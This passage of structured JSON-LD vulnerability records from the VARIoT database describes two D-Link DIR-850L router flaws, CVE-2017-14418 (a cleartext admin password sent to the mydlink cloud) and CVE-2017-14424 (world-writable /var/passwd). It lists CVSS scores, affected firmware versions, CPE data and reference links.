      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0589",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      }
    ]
  },
  "cve": "CVE-2017-14418",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14418",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-31791",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-105138",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.1,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14418",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14418",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31791",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-577",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105138",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The D-Link NPAPI extension, as used in conjunction with D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices, sends the cleartext admin password over the Internet as part of interaction with mydlink Cloud Services. D-Link DIR-850L The device firmware contains a vulnerability related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in the D-Link NPAPI extension used in the D-LinkDIR-850LREV.B device using FW208WWb02 and previous firmware. An attacker could use this vulnerability to retrieve an administrator password",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105138"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14418",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105138",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "id": "VAR-201709-0589",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105138"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:34:08.156000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100053"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-522",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-255",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14418"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14418"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105138"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105138"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "date": "2017-09-13T17:29:00.400000",
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31791"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105138"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      },
      {
        "date": "2023-11-08T20:58:01.420000",
        "db": "NVD",
        "id": "CVE-2017-14418"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to certificate / password management in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008137"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-577"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0595

Vulnerability from variot - Updated: 2023-12-18 13:29

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/passwd permissions, i.e. the file is readable and writable by every local user. D-Link DIR-850L device firmware contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. A security vulnerability exists in REV. A devices using firmware FW114WWb07_h2ab_beta1 and earlier and in REV. B devices using firmware FW208WWb02 and earlier. An attacker could exploit the vulnerability to obtain a certificate (machine-translated wording; "credentials" is probably meant).


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0595",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      }
    ]
  },
  "cve": "CVE-2017-14424",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14424",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2017-31785",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-105145",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14424",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14424",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31785",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-571",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105145",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105145"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/passwd permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could exploit the vulnerability to obtain a certificate",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105145"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14424",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105145",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105145"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008099"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14424"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-571"
      }
    ]
  },
  "id": "VAR-201709-0595",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31785"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105145"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
